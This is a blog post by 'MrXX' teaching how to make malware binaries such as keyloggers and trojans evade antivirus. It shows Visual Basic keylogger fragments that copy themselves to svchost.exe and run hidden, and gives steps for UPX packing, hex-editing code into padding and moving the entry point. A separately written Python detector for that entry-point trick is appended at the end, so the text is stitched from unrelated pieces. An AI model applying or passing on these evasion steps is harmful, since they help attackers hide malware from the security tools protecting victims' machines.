9 Oct
Making malware and viruses undetectable by antivirus
In the name of god
Hi, I'm MrXX and in this blog I want to talk about coding, reversing and more…
And please don't post shit comments in the index, because we are going to delete them
And please don't spam us with noob questions, because we don't answer noobs
And the last thing: sorry about the English, because I can't even speak English (I can only read it), by the way
First, I want to talk about some reversing (I'm tired and sick and my mind isn't working correctly)
This is not my tutorial; I searched the web for 2 or 3 days to find the best way, and I think this is the best way (original tutorial by: Kenny)
How to make malware undetected by antivirus
First we need tools
1-Hex editor: I use HIEW (not the 32-bit version)
2-PE Tools: I use PE Tools v1.5
3-UPX
4-What crackers call a BRAIN (I think I've got one, but I can't give it to you, go find your own)
If you don't know what those tools are and how to use them: I tell you, go f.u.c.k yourself and please don't read this
OK, I read the magic words and dorooooororooooooo: oh my god, magic happened :) my f.u.c.k.ing malware is undetected, ha ha ha ha. I'm kidding, there is no magic, magic is just shit; everything in this whole world has a logical reason (I don't believe in magic)
There are only a few ways to make malware (Trojan, rootkit, virus, …) undetected, and if you like it I'll tell you all the possible ways to make our malware tools undetected, but I'll tell them one by one, and if I see some "kididi mididi thanks" in the comments I'll tell you the next magic word
Let's pull the chair close to your PC and get started
I wrote my own keylogger many years ago, but the goddamn antivirus knows my own private keylogger as "probably unknown NewHeur_PE virus"
And NOD wants to submit this to their database
Oh my god, how could this happen :) Don't worry about that, next time I'll tell you how to bypass the stupid antivirus with some cryptography
This time I want to make a binary file undetected (you can use this on any malware binary you don't have the source of)
See the VirusTotal result: that's nasty
And you will see that some antivirus products detect the malware and some don't, because it is private
Malware gets detected because of lines like:
Dim ModuleName As String, FileName As String, hInst As Long
ModuleName = String$(128, Chr$(0))
hInst = GetWindowWord(Me.hwnd, GWW_HINSTANCE)
ModuleName = Left$(ModuleName, GetModuleFileName(hInst, ModuleName, Len(ModuleName)))
If CheckPath(SystemDir + "svchost.exe") = False Then
FileCopy ModuleName, SystemDir + "svchost.exe"
ShellExecute Me.hwnd, "open", SystemDir + "svchost.exe", vbNullString, vbNullString, SW_HIDE
End
End If
Or
Because it uses these APIs:
Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib "user32" (ByVal hHook As Long) As Long
And…
OK, later we'll crypt those commands and use the APIs very cleverly to bypass the noob antivirus
Oh, we have talked too much; let's get back to the undetected part
First we pack the file with UPX (or something else) and open our packed file with PE Tools
Open the file and get some info about the entry point:
Entry Point: 0000AD20
Image Base: 00400000
Now we open the packed file with HIEW in disassemble mode and go to the entry point
You will see an entry like this
This is the entry that UPX made
When we scroll down some lines we will see zero space; we use this for hexing our tool
Place these codes into the zero space
Use the edit command (F3/F2)
push 00040AD20 <— push OEP
push eax
pushfd <—for tricking AVP
pushad <—for tricking AVP
call .000025154 <—– call for Ret 28h
retn 00028
The addresses depend on your system; they are not static
After that, save the progress
And again add 2 lines
INC ECX <— Counter up
Loop 000022D9
Save them again
OK, our hexing is finished; now we must go and change our entry point to the new entry
We open PE Tools again and change the entry point to the new value
OEP = entry address - image base (400000)
New entry:0040AED9
After that we unpack the file with UPX and it must be undetected by AV
This method is called: changing the entry point to make the malware undetected
That's the nice way, but we also have easy ways like packing the file, hexing the signature of the file and …
In the next post I'll talk about ELF files and reversing
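As an added example (not from this post or from Kenny's tutorial), here is how a defender can spot the layout this trick leaves behind: the entry point no longer sits on the stock UPX stub but in the zero padding after it. The minimal PE builder and the section bytes are constructed here so the check runs offline; the "first byte of a UPX1 entry point should be pushad" rule and the 16-byte zero window are this example's own heuristics, not something any AV product is known to use in exactly this form.

```python
import struct

SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER: name, vsize, vaddr, rawsize, rawptr, ..., characteristics

def build_sample_pe(entry_rva: int, body: bytes) -> bytes:
    """Construct a minimal PE32 image with one UPX1 section (sample data, not a real binary)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)          # e_lfanew lives at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)    # i386, 1 section, 224-byte opt hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                       # ImageBase, same as in the post
    rawptr = e_lfanew + 4 + 20 + 224 + 40                           # section body follows the headers
    sec = struct.pack(SECTION_HDR, b"UPX1", len(body), 0x1000, len(body), rawptr, 0, 0, 0, 0, 0xE0000040)
    return dos + b"PE\0\0" + coff + bytes(opt) + sec + body

def check_entry_point(pe: bytes) -> dict:
    """Find the section holding AddressOfEntryPoint and apply two heuristics:
    stub_mismatch: a UPX1 entry point whose first byte is not pushad (0x60) is not the stock UPX stub;
    in_slack: an entry point preceded by 16 zero bytes sits in padding the packer never wrote to."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt = e_lfanew + 24
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    ep_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(SECTION_HDR, pe, opt + opt_size + 40 * i)
        if vaddr <= ep_rva < vaddr + max(vsize, rawsize):
            ep_file = rawptr + (ep_rva - vaddr)                     # RVA -> file offset
            before = pe[max(rawptr, ep_file - 16):ep_file]
            return {"section": name.rstrip(b"\0").decode(),
                    "executable": bool(chars & 0x20000000),
                    "stub_mismatch": name.startswith(b"UPX1") and pe[ep_file] != 0x60,
                    "in_slack": len(before) == 16 and not any(before)}
    raise ValueError("entry point outside every section")
# Constructed UPX1 body: packed data, a stub beginning with pushad, zero slack, then bytes planted in it.
PACKED = bytes(range(1, 65))                 # 64 non-zero bytes standing in for compressed data
STUB = b"\x60\xbe\x00\x10\x40\x00"           # pushad; mov esi, imm32 (how a UPX stub opens)
SLACK = b"\0" * 64
PLANTED = b"\x68\x00\x00\x00\x00\xc3"        # push imm32; ret (placeholder for code written into the slack)
BODY = PACKED + STUB + SLACK + PLANTED
STUB_EP = 0x1000 + len(PACKED)
PLANTED_EP = STUB_EP + len(STUB) + len(SLACK)
def demo():
    """Compare the untouched packed layout with one whose entry point was moved into the slack."""
    return (check_entry_point(build_sample_pe(STUB_EP, BODY)),
            check_entry_point(build_sample_pe(PLANTED_EP, BODY)))
```

A real scanner would apply the same two checks to every executable section, not just UPX1, and treat a hit as a reason to emulate or unpack rather than as a verdict on its own.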
Good Luck
MrXX